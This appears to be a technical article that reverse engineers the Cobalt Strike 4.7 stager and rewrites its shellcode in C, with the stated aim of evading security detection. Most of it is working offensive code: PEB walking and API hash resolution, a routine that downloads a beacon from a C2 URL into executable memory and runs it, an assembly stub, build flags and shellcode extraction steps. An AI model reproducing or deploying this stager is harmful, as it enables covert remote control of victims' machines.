CS 4.7 Stager reverse engineering and shellcode rewriting

1. Overview

I have always wanted to write my own C2 framework, but I do not have the skill for it yet. Cobalt Strike (CS) is still the best C2 on the market, but security vendors watch it closely, and evading detection with a loader alone has limited effect. I later saw that someone had rewritten the CS beacon in Go. I liked the idea, but Go brings compilation problems and many restrictions on how the result can be loaded, so I considered rewriting the beacon in C instead. The beacon has many functions, though, and rewriting them all in a short time is laborious, so I decided to start with the stager: rewrite it, convert it into shellcode, and load it through a loader. CS 4.7 has been out for a while. This article reverse engineers the CS stager and then rewrites the stager shellcode in C.

2. Sample information

Sample name: artifact.exe (64-bit exe generated through CS’s Windows Stager Payload)

3. Stager Reverse

The stager that CS generates in exe format is essentially a shellcode loader; the shellcode inside it is what actually pulls down the beacon. Because a loader can be implemented in many ways, and the stager's loading process has not changed significantly in version 4.7, we only analyze the loading part briefly.

3.1 Shellcode loading part:

The main function goes straight into sub_4017F8, so we look at that function's implementation:

sub_4017F8 first obtains the system timestamp, then creates a thread so that the shellcode is passed through a pipe, read back, and executed:

The assembled pipe name is \\.\pipe\MSSE-3410-server:
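The name is assembled from a fixed template plus a number derived from the timestamp. A minimal sketch in portable C, assuming the `MSSE-%d-server` template and a modulus of 9898 as found in the publicly available Artifact Kit template (the article itself only shows the resulting name); `build_pipe_name` is a hypothetical helper name:

```c
#include <assert.h>
#include <stddef.h>
#include <stdio.h>

/* Hypothetical helper: formats the named-pipe path from a tick value.
 * The modulus 9898 is an assumption taken from the public Artifact Kit
 * template, not something shown in the analysis above. */
static int build_pipe_name(char *out, size_t cap, unsigned long tick)
{
    assert(out != NULL && cap > 0);
    /* "\\\\.\\pipe\\" in C source is the literal path prefix \\.\pipe\ */
    return snprintf(out, cap, "\\\\.\\pipe\\MSSE-%lu-server", tick % 9898UL);
}
```

In the real loader the tick value would come from GetTickCount, so the numeric part changes from run to run.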

Follow the thread start routine passed to CreateThread:

It leads to WriteShellcodeToPipe_401630, which creates the pipe and writes the shellcode to it in a loop:

The shellcode content is as follows:

Write shellcode:

Follow up with the ShellcodeExec_4017A6 function, which receives shellcode from the pipe and decrypts it for execution:

Read shellcode from pipe into memory:

Decrypt and execute the read shellcode in the DecryptAndExecShellcode_401595 function:

The decrypted shellcode can be found through the parameters passed to CreateThread, and the starting address is stored in the R9 register:
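The article does not name the decryption algorithm used by DecryptAndExecShellcode_401595. As a sketch only, assuming the rolling 4-byte XOR used by the public Artifact Kit template, the decoding step could look like this (`xor_decode` is a hypothetical name):

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* Hypothetical helper: decodes `len` bytes from `src` into `dst` with a
 * rolling 4-byte XOR key. Both the key length and the XOR scheme are
 * assumptions based on the public Artifact Kit template. */
static void xor_decode(uint8_t *dst, const uint8_t *src, size_t len,
                       const uint8_t key[4])
{
    assert(dst != NULL && src != NULL && key != NULL);
    for (size_t i = 0; i < len; i++) {
        dst[i] = src[i] ^ key[i % 4];
    }
}
```

In the loader, `dst` would be the freshly allocated buffer whose address is later handed to CreateThread.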

3.2 Shellcode execution part:

Shellcode is position-independent code and cannot call Win32 APIs directly through an import table. The CS shellcode walks the PEB and each module's PE export table, and locates the modules and API functions it needs by the hash of the module name and exported function name:

3.2.1 Traverse PEB to obtain Win32API

Traverse the PEB:

Calculate module hash:

Find exported functions:

The complete disassembly of this section, with comments, is as follows:

| mov rdx,qword ptr gs:[rdx + 60] | Get the PEB address
| mov rdx,qword ptr ds:[rdx + 18] | PEB->Ldr (PEB_LDR_DATA)
| mov rdx,qword ptr ds:[rdx + 20] | First entry of the InMemoryOrderModuleList linked list
| mov rsi,qword ptr ds:[rdx + 50] | rsi = pointer to the module name (BaseDllName.Buffer)
| movzx rcx,word ptr ds:[rdx + 4A] | rcx = module name length in bytes (BaseDllName.MaximumLength, Unicode)
| xor r9,r9 | Clear the module hash
| xor rax,rax |
| lodsb | Read the module name byte by byte
| cmp al,61 | Compare with 'a' (0x61)
| jl A0037 | Below 'a': skip the case conversion
| sub al,20 | Otherwise convert lowercase to uppercase
| ror r9d,D | Rotate the hash right by 13 bits (ROR13)
| add r9d,eax | Add the current byte; the running hash stays in R9
| loop A002D | Repeat for every byte of the name
| push rdx | Save the current list entry
| push r9 | Save the module hash
| mov rdx,qword ptr ds:[rdx + 20] | Module base address (DllBase)
| mov eax,dword ptr ds:[rdx + 3C] | Read e_lfanew at offset 0x3C
| add rax,rdx | rax points to the PE header (NT headers)
| cmp word ptr ds:[rax + 18],20B | Check that OptionalHeader.Magic is 0x20B (PE32+)
| jne A00C7 |
| mov eax,dword ptr ds:[rax + 88] | eax = export table RVA
| test rax,rax |
| je A00C7 | No export table: move on
| add rax,rdx | Module base address + export table RVA = export table VA
| push rax |
| mov ecx,dword ptr ds:[rax + 18] | ecx = number of exported names (NumberOfNames)
| mov r8d,dword ptr ds:[rax + 20] | r8d = RVA of the name pointer array (AddressOfNames)
| add r8,rdx | VA of the name pointer array
| jrcxz A00C6 |
| dec rcx |
| mov esi,dword ptr ds:[r8 + rcx*4] | RVA of the next exported function name, walking from last to first
| add rsi,rdx | VA of the current exported function name
| xor r9,r9 | Clear the function hash
| xor rax,rax |
| lodsb | Read the exported function name character by character
| ror r9d,D | Rotate the hash right by 13 bits (ROR13)
| add r9d,eax | Add the current character; the running hash stays in R9
| cmp al,ah | The string ends with 0; al and ah are then both 0 and the loop ends
| jne A007D | Not 0: keep hashing
| add r9,qword ptr ss:[rsp + 8] | Add the module hash to the function hash
| cmp r9d,r10d | Compare the result with the target hash in R10
| jne A006E | No match: jump back and try the next name
| pop rax |

This lookup code is then run repeatedly to resolve the following API functions by hash:

0x0726774C => LoadLibraryA
0xA779563A => InternetOpenA
0xC69F8957 => InternetConnectA
0x3B2E55EB => HttpOpenRequestA
0x7B18062D => HttpSendRequestA
0xE553A458 => VirtualAlloc
0xE2899612 => InternetReadFile
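
The hashing in the disassembly above can be restated in portable C. This is a sketch rather than the stager's own code: the function names are made up for illustration, and module names are assumed to be plain ASCII stored as UTF-16LE, as they are in the loader data for system DLLs.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* Rotate a 32-bit value right by n bits (0 < n < 32). */
static uint32_t ror32(uint32_t v, unsigned n)
{
    return (v >> n) | (v << (32u - n));
}

/* Module hash: the name is hashed as UTF-16LE bytes, terminator included,
 * with lowercase ASCII folded to uppercase. ASCII-only names are assumed. */
static uint32_t hash_module(const char *name)
{
    uint32_t h = 0;
    assert(name != NULL);
    for (size_t i = 0;; i++) {
        uint8_t c = (uint8_t)name[i];
        if (c >= 0x61) c -= 0x20;   /* same test as cmp al,61 / sub al,20 */
        h = ror32(h, 13) + c;       /* low byte of the UTF-16 code unit */
        h = ror32(h, 13);           /* high byte, which is 0 for ASCII */
        if (name[i] == '\0') break; /* the terminator is hashed too */
    }
    return h;
}

/* Function hash: plain ASCII export name, terminator included. */
static uint32_t hash_function(const char *name)
{
    uint32_t h = 0;
    assert(name != NULL);
    for (size_t i = 0;; i++) {
        h = ror32(h, 13) + (uint8_t)name[i];
        if (name[i] == '\0') break;
    }
    return h;
}

/* Combined value that the stager compares against the constant in R10. */
static uint32_t hash_api(const char *module, const char *function)
{
    return hash_module(module) + hash_function(function);
}
```

With these definitions, `hash_api("kernel32.dll", "LoadLibraryA")` should reproduce the first constant in the list, 0x0726774C, and the module name is case-insensitive because of the uppercase folding.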
3.2.2 Request the C2 server to establish a connection
Call LoadLibraryA to load wininet.dll:

Call InternetOpenA for initialization:

Call InternetConnectA to establish an http session with the control end:

Call HttpOpenRequestA to create an http request:

Call HttpSendRequestA to send the specified request to the server:

3.2.3 Get Beacon loaded and online
Call VirtualAlloc to allocate memory for beacon:

Call InternetReadFile in a loop to read the beacon into the allocated memory:

Jump to the memory space of beacon:

After that, the beacon decrypts itself and comes online through reflective DLL injection. That is beyond the scope of this article, so I won't go into detail.

4. Rewriting the shellcode in C

From the analysis above we now understand the basic function of the CS stager. Its shellcode calls API functions in wininet.dll to send an HTTP request to the C2 server, allocates memory, reads the beacon into that memory, and jumps to it. In C, we only need to call the same API functions to achieve the same result.

However, our goal is for the C code to be convertible into shellcode. That way we keep the flexible loading that shellcode offers while controlling its behavior freely from C (assembly experts, please go easy on me). Because shellcode is position-independent code, we cannot call the Windows API directly as we would in a normally compiled executable. This is why the CS shellcode contains code that walks the PEB and the export tables to obtain the Windows API functions it needs.

After clarifying the idea, the only thing left is to write the code. The key code is given below.

4.1 Code implementation of Shellcode
4.1.1 Traverse PEB to obtain Win32API
Plenty of code examples already exist for this part, so we can simply reuse one:

#include <windows.h>
#include <winternl.h>

// This compiles to a ROR instruction
// This is needed because _lrotr() is an external reference
// Also, there is not a consistent compiler intrinsic to accomplish this across all three platforms.
#define ROTR32(value, shift) (((DWORD) value >> (BYTE) shift) | ((DWORD) value << (32 - (BYTE) shift)))

// Redefine PEB structures. The structure definitions in winternl.h are incomplete.
typedef struct _MY_PEB_LDR_DATA {
    ULONG Length;
    BOOL Initialized;
    PVOID SsHandle;
    LIST_ENTRY InLoadOrderModuleList;
    LIST_ENTRY InMemoryOrderModuleList;
    LIST_ENTRY InInitializationOrderModuleList;
} MY_PEB_LDR_DATA, *PMY_PEB_LDR_DATA;

typedef struct _MY_LDR_DATA_TABLE_ENTRY
{
    LIST_ENTRY InLoadOrderLinks;
    LIST_ENTRY InMemoryOrderLinks;
    LIST_ENTRY InInitializationOrderLinks;
    PVOID DllBase;
    PVOID EntryPoint;
    ULONG SizeOfImage;
    UNICODE_STRING FullDllName;
    UNICODE_STRING BaseDllName;
} MY_LDR_DATA_TABLE_ENTRY, *PMY_LDR_DATA_TABLE_ENTRY;

HMODULE GetProcAddressWithHash( _In_ DWORD dwModuleFunctionHash )
{
    PPEB PebAddress;
    PMY_PEB_LDR_DATA pLdr;
    PMY_LDR_DATA_TABLE_ENTRY pDataTableEntry;
    PVOID pModuleBase;
    PIMAGE_NT_HEADERS pNTHeader;
    DWORD dwExportDirRVA;
    PIMAGE_EXPORT_DIRECTORY pExportDir;
    PLIST_ENTRY pNextModule;
    DWORD dwNumFunctions;
    USHORT usOrdinalTableIndex;
    PDWORD pdwFunctionNameBase;
    PCSTR pFunctionName;
    UNICODE_STRING BaseDllName;
    DWORD dwModuleHash;
    DWORD dwFunctionHash;
    PCSTR pTempChar;
    DWORD i;

#if defined(_WIN64)
    PebAddress = (PPEB) __readgsqword( 0x60 );
#elif defined(_M_ARM)
    // I can assure you that this is not a mistake. The C compiler improperly emits the proper opcodes
    // necessary to get the PEB.Ldr address
    PebAddress = (PPEB) ( (ULONG_PTR) _MoveFromCoprocessor(15, 0, 13, 0, 2) + 0);
    __emit( 0x00006B1B );
#else
    PebAddress = (PPEB) __readfsdword( 0x30 );
#endif

    pLdr = (PMY_PEB_LDR_DATA) PebAddress->Ldr;
    pNextModule = pLdr->InLoadOrderModuleList.Flink;
    pDataTableEntry = (PMY_LDR_DATA_TABLE_ENTRY) pNextModule;

    while (pDataTableEntry->DllBase != NULL)
    {
        dwModuleHash = 0;
        pModuleBase = pDataTableEntry->DllBase;
        BaseDllName = pDataTableEntry->BaseDllName;
        pNTHeader = (PIMAGE_NT_HEADERS) ((ULONG_PTR) pModuleBase + ((PIMAGE_DOS_HEADER) pModuleBase)->e_lfanew);
        dwExportDirRVA = pNTHeader->OptionalHeader.DataDirectory[0].VirtualAddress;

        // Get the next loaded module entry
        pDataTableEntry = (PMY_LDR_DATA_TABLE_ENTRY) pDataTableEntry->InLoadOrderLinks.Flink;

        // If the current module does not export any functions, move on to the next module.
        if (dwExportDirRVA == 0)
        {
            continue;
        }

        // Calculate the module hash over the raw bytes of the Unicode name
        for (i = 0; i < BaseDllName.MaximumLength; i++)
        {
            pTempChar = ((PCSTR) BaseDllName.Buffer + i);

            dwModuleHash = ROTR32( dwModuleHash, 13 );

            if ( *pTempChar >= 0x61 )
            {
                dwModuleHash += *pTempChar - 0x20;
            }
            else
            {
                dwModuleHash += *pTempChar;
            }
        }

        pExportDir = (PIMAGE_EXPORT_DIRECTORY) ((ULONG_PTR) pModuleBase + dwExportDirRVA);

        dwNumFunctions = pExportDir->NumberOfNames;
        pdwFunctionNameBase = (PDWORD) ((PCHAR) pModuleBase + pExportDir->AddressOfNames);

        for (i = 0; i < dwNumFunctions; i++)
        {
            dwFunctionHash = 0;
            pFunctionName = (PCSTR) (*pdwFunctionNameBase + (ULONG_PTR) pModuleBase);
            pdwFunctionNameBase++;

            pTempChar = pFunctionName;

            // Hash the function name, including its terminating 0
            do
            {
                dwFunctionHash = ROTR32( dwFunctionHash, 13 );
                dwFunctionHash += *pTempChar;
                pTempChar++;
            } while (*(pTempChar - 1) != 0);

            dwFunctionHash += dwModuleHash;

            if (dwFunctionHash == dwModuleFunctionHash)
            {
                usOrdinalTableIndex = *(PUSHORT)(((ULONG_PTR) pModuleBase + pExportDir->AddressOfNameOrdinals) + (2 * i));
                return (HMODULE) ((ULONG_PTR) pModuleBase + *(PDWORD)(((ULONG_PTR) pModuleBase + pExportDir->AddressOfFunctions) + (4 * usOrdinalTableIndex)));
            }
        }
    }

    // All modules have been exhausted and the function was not found.
    return NULL;
}
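
After bringing in the code above, we also need to define types for the API functions we use. Here we try a slightly different set of APIs from the original stager for testing (InternetOpenUrlA in place of InternetConnectA, HttpOpenRequestA and HttpSendRequestA):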

typedef HMODULE(WINAPI* FN_LoadLibraryA)(
    _In_ LPCSTR lpLibFileName
);

typedef LPVOID(WINAPI* FN_VirtualAlloc)(
    _In_opt_ LPVOID lpAddress,
    _In_ SIZE_T dwSize,
    _In_ DWORD flAllocationType,
    _In_ DWORD flProtect
);

typedef LPVOID(WINAPI* FN_InternetOpenA)(
    _In_ LPCSTR lpszAgent,
    _In_ DWORD dwAccessType,
    _In_ LPCSTR lpszProxy,
    _In_ LPCSTR lpszProxyBypass,
    _In_ DWORD dwFlags
);

typedef HANDLE(WINAPI* FN_InternetOpenUrlA)(
    _In_ LPVOID hInternet,
    _In_ LPCSTR lpszUrl,
    _In_ LPCSTR lpszHeaders,
    _In_ DWORD dwHeadersLength,
    _In_ DWORD dwFlags,
    _In_ DWORD_PTR dwContext
);

typedef BOOL(WINAPI* FN_InternetReadFile)(
    _In_ LPVOID hFile,
    _Out_ LPVOID lpBuffer,
    _In_ DWORD dwNumberOfBytesToRead,
    _Out_ LPDWORD lpdwNumberOfBytesRead
);

typedef struct tagApiInterface {
    FN_LoadLibraryA pfnLoadLibrary;
    FN_VirtualAlloc pfnVirtualAlloc;
    FN_InternetOpenA pfnInternetOpenA;
    FN_InternetOpenUrlA pfnInternetOpenUrlA;
    FN_InternetReadFile pfnInternetReadFile;
} APIINTERFACE, *PAPIINTERFACE;
Now that we have the defined function and the GetProcAddressWithHash function, we just need to find the function we need through hash:

#pragma warning( push )
#pragma warning( disable : 4055 )
ai.pfnLoadLibrary = (FN_LoadLibraryA)GetProcAddressWithHash(0x0726774C);
ai.pfnLoadLibrary(szWininet);
ai.pfnLoadLibrary(szUser32);

ai.pfnVirtualAlloc = (FN_VirtualAlloc)GetProcAddressWithHash(0xE553A458);
ai.pfnInternetOpenA = (FN_InternetOpenA)GetProcAddressWithHash(0xA779563A);
ai.pfnInternetOpenUrlA = (FN_InternetOpenUrlA)GetProcAddressWithHash(0xF07A8777);
ai.pfnInternetReadFile = (FN_InternetReadFile)GetProcAddressWithHash(0xE2899612);

#pragma warning(pop)
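
The snippet above passes `szWininet` and `szUser32` without showing how they are declared. A minimal portable sketch, assuming they are character arrays initialized element by element so that the bytes are typically emitted as immediate stores inside the function instead of being placed in a separate data section (`use_name` is a hypothetical stand-in for a resolved API such as LoadLibraryA):

```c
#include <assert.h>
#include <stddef.h>

/* Hypothetical stand-in for a resolved API such as LoadLibraryA: it only
 * measures the string so that the sketch stays portable. */
static size_t use_name(const char *name)
{
    size_t n = 0;
    assert(name != NULL);
    while (name[n] != '\0') n++;
    return n;
}

static size_t load_modules_sketch(void)
{
    /* Element-wise initializers usually keep the bytes inside the function
     * body; a string literal would normally land in a read-only data
     * section that the extracted shellcode does not carry along. */
    char szWininet[] = { 'w', 'i', 'n', 'i', 'n', 'e', 't', 0 };
    char szUser32[]  = { 'u', 's', 'e', 'r', '3', '2', 0 };

    return use_name(szWininet) + use_name(szUser32);
}
```

Whether the compiler really keeps a given array out of the data sections depends on its length and the optimization settings, so it is worth checking the generated assembly listing for each string.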
4.1.2 Establish a connection to receive Beacon
LPVOID hInternet = ai.pfnInternetOpenA(0, 0, NULL, 0, NULL);
HANDLE hInternetOpenUrl = ai.pfnInternetOpenUrlA(hInternet, HttpURL, NULL, 0, 0x80000000, 0);
LPVOID addr = ai.pfnVirtualAlloc(0, 0x400000, MEM_COMMIT, PAGE_EXECUTE_READWRITE);

recv_tmp = 1;
recv_tot = 0;
beacon_index = addr;

while (recv_tmp > 0) {
    ai.pfnInternetReadFile(hInternetOpenUrl, beacon_index, 8192, (PDWORD)&recv_tmp);
    recv_tot += recv_tmp;
    beacon_index += recv_tmp;
}

((void(*)())addr)();
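
The receive loop above assumes that the payload fits into the 0x400000-byte allocation and does not check the return value of InternetReadFile. A bounded variant can be sketched as follows. To keep the sketch portable, the network read is hidden behind a hypothetical callback type `read_fn` with InternetReadFile-like semantics, and `mem_read` is a demo source that exists only to exercise the loop:

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* Hypothetical reader callback modeled on InternetReadFile: returns nonzero
 * on success and stores the number of bytes read (0 at end of data). */
typedef int (*read_fn)(void *ctx, void *buf, uint32_t want, uint32_t *got);

/* Reads until end of data, an error, or a full buffer.
 * Returns the total number of bytes stored in dst. */
static size_t read_all(read_fn rd, void *ctx, uint8_t *dst, size_t cap)
{
    size_t total = 0;
    assert(rd != NULL && dst != NULL);
    while (total < cap) {
        size_t room = cap - total;
        uint32_t want = room < 8192 ? (uint32_t)room : 8192u;
        uint32_t got = 0;
        if (!rd(ctx, dst + total, want, &got) || got == 0) {
            break;              /* error or end of data */
        }
        total += got;
    }
    return total;
}

/* Demo source used only to exercise read_all: serves bytes from memory. */
struct mem_src { const uint8_t *data; size_t len, pos; };

static int mem_read(void *ctx, void *buf, uint32_t want, uint32_t *got)
{
    struct mem_src *s = ctx;
    size_t n = s->len - s->pos;
    if (n > want) n = want;
    memcpy(buf, s->data + s->pos, n);
    s->pos += n;
    *got = (uint32_t)n;
    return 1;
}
```

In the shellcode itself the callback would be replaced by a direct call through `ai.pfnInternetReadFile`, with `cap` set to the size passed to VirtualAlloc.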
4.1.3 Code adjustment under 64-bit
To guarantee that our shellcode reaches its entry point with correct stack alignment on 64-bit, we need to write an asm stub that guarantees alignment and use its resulting object file as an additional dependency to the linker:

EXTRN ExecutePayload:PROC
PUBLIC AlignRSP             ; Marking AlignRSP as PUBLIC allows for the function
                            ; to be called as an extern in our C code.

_TEXT SEGMENT

; AlignRSP is a simple call stub that ensures that the stack is 16-byte aligned prior
; to calling the entry point of the payload. This is necessary because 64-bit functions
; in Windows assume that they were called with 16-byte stack alignment. When amd64
; shellcode is executed, you can't be assured that your stack is 16-byte aligned. For example,
; if your shellcode lands with 8-byte stack alignment, any call to a Win32 function will likely
; crash upon calling any ASM instruction that utilizes XMM registers (which require 16-byte
; alignment).

AlignRSP PROC
    push rsi                        ; Preserve RSI since we're stomping on it
    mov  rsi, rsp                   ; Save the value of RSP so it can be restored
    and  rsp, 0FFFFFFFFFFFFFFF0h    ; Align RSP to 16 bytes
    sub  rsp, 020h                  ; Allocate homing space for ExecutePayload
    call ExecutePayload             ; Call the entry point of the payload
    mov  rsp, rsi                   ; Restore the original value of RSP
    pop  rsi                        ; Restore RSI
    ret                             ; Return to caller
AlignRSP ENDP

_TEXT ENDS

END
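
The arithmetic performed by the stub can be checked with ordinary integers. The sketch below only mirrors the `and` and `sub` instructions on a sample value; the function names are illustrative and no real stack is involved:

```c
#include <assert.h>
#include <stdint.h>

/* Rounds an address down to the nearest 16-byte boundary, the same
 * operation the stub applies to RSP with its AND mask. */
static uint64_t align_down_16(uint64_t addr)
{
    return addr & ~(uint64_t)0xF;
}

/* Mirrors the stub's arithmetic: align, then reserve 0x20 bytes of
 * home space for the callee. The result is still 16-byte aligned. */
static uint64_t rsp_before_call(uint64_t rsp_after_push)
{
    uint64_t rsp = align_down_16(rsp_after_push) - 0x20;
    assert((rsp & 0xF) == 0);
    return rsp;
}
```

Because the `call` instruction then pushes an 8-byte return address, ExecutePayload is entered with RSP at 8 modulo 16, which is the state the x64 calling convention expects at function entry.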
We also need a header file to help us call the above assembly function:

#if defined(_WIN64)
extern VOID AlignRSP( VOID );

VOID Begin( VOID )
{
    // Call the ASM stub that will guarantee 16-byte stack alignment.
    // The stub will then call the ExecutePayload.
    AlignRSP();
}
#endif
4.1.4 Other pitfalls
(1) String arguments must be passed as character arrays rather than string literals;

(2) The strings must not be too long. If a string is too long, the compiler places it in another section, and the extracted shellcode can no longer find its address;

(3) If CS uses the default profile, the request URL must pass the CS checksum8 check;
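
For item (3), the check can be sketched as below. This assumes the commonly documented rule: the characters of the request path (slashes skipped) are summed modulo 256, and the result must be 92 for an x86 stager or 93 for an x64 stager. Treat these constants as assumptions to verify against the team server in use; the function names are illustrative.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* Sum of the path characters modulo 256, with '/' skipped.
 * The rule and the target values 92 (x86) and 93 (x64) are the commonly
 * documented defaults, stated here as assumptions. */
static unsigned checksum8(const char *uri)
{
    unsigned sum = 0;
    assert(uri != NULL);
    for (size_t i = 0; uri[i] != '\0'; i++) {
        if (uri[i] != '/') sum += (uint8_t)uri[i];
    }
    return sum % 256u;
}

/* Returns nonzero when the path would be accepted as an x64 stager request. */
static int is_x64_stager_uri(const char *uri)
{
    return checksum8(uri) == 93u;
}
```

For example, the path "/WWWX" sums to 349, which is 93 modulo 256, so it would qualify as an x64 stager request under this rule.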

4.2 Modify the Visual Studio configuration
After writing the code, we also need to change some Visual Studio options so that usable shellcode can be extracted from the compiled exe file:

Compiler:

/GS- /TC /GL /W4 /O1 /nologo /Zl /FA /Os

Linker:

/LTCG "x64\Release\AdjustStack.obj" /ENTRY:"Begin" /OPT:REF /SAFESEH:NO

/SUBSYSTEM:CONSOLE /MAP /ORDER:@"function_link_order64.txt" /OPT:ICF /NOLOGO

/NODEFAULTLIB

Among them, AdjustStack.obj is the object file we mentioned above, function_link_order64.txt is the link order we specified, and its content is as follows:

Begin // Entry function
GetProcAddressWithHash
ExecutePayload // shellcode function
4.3 Extract shellcode and go online
After configuring these options, build the project to generate the exe, then extract the .text section to obtain our shellcode:
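
The extraction step can be done with any PE tool. As an illustration, the sketch below locates the raw bytes of the `.text` section in a file that has already been read into memory. `find_text_section` is a hypothetical helper, and the field offsets follow the published PE/COFF layout:

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* Little-endian field readers for an in-memory copy of the file. */
static uint16_t rd16(const uint8_t *p) { return (uint16_t)(p[0] | (p[1] << 8)); }
static uint32_t rd32(const uint8_t *p)
{
    return (uint32_t)p[0] | ((uint32_t)p[1] << 8) |
           ((uint32_t)p[2] << 16) | ((uint32_t)p[3] << 24);
}

/* Hypothetical helper: finds the file offset and size of ".text".
 * Returns 1 and fills *off and *size on success, 0 otherwise. */
static int find_text_section(const uint8_t *img, size_t len,
                             uint32_t *off, uint32_t *size)
{
    assert(img != NULL && off != NULL && size != NULL);
    if (len < 0x40 || img[0] != 'M' || img[1] != 'Z') return 0;

    size_t pe = rd32(img + 0x3C);                 /* e_lfanew */
    if (pe > len || len - pe < 24 || memcmp(img + pe, "PE\0\0", 4) != 0) return 0;

    uint16_t nsec  = rd16(img + pe + 6);          /* NumberOfSections */
    uint16_t optsz = rd16(img + pe + 20);         /* SizeOfOptionalHeader */
    size_t sec = pe + 24 + optsz;                 /* first section header */

    for (uint16_t i = 0; i < nsec; i++, sec += 40) {
        if (sec > len || len - sec < 40) return 0;
        if (memcmp(img + sec, ".text\0\0\0", 8) != 0) continue;
        uint32_t vsz = rd32(img + sec + 8);       /* VirtualSize */
        uint32_t rsz = rd32(img + sec + 16);      /* SizeOfRawData (file-aligned) */
        *size = (vsz != 0 && vsz < rsz) ? vsz : rsz;  /* drop alignment padding */
        *off  = rd32(img + sec + 20);             /* PointerToRawData */
        return (*off <= len && *size <= len - *off);
    }
    return 0;
}
```

The bytes from `img + off` to `img + off + size` are then written out as the shellcode. With the link order shown above, `Begin` should sit at the start of that range.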

Testing with a simple loader, the beacon comes online successfully:

5. Reference links

https://bbs.kanxue.com/thread-264470.htm#msg_header_h2_0

https://web.archive.org/web/20210305190309/http://www.exploit-monday.com/2013/08/writing-optimized-windows-shellcode-in-c.html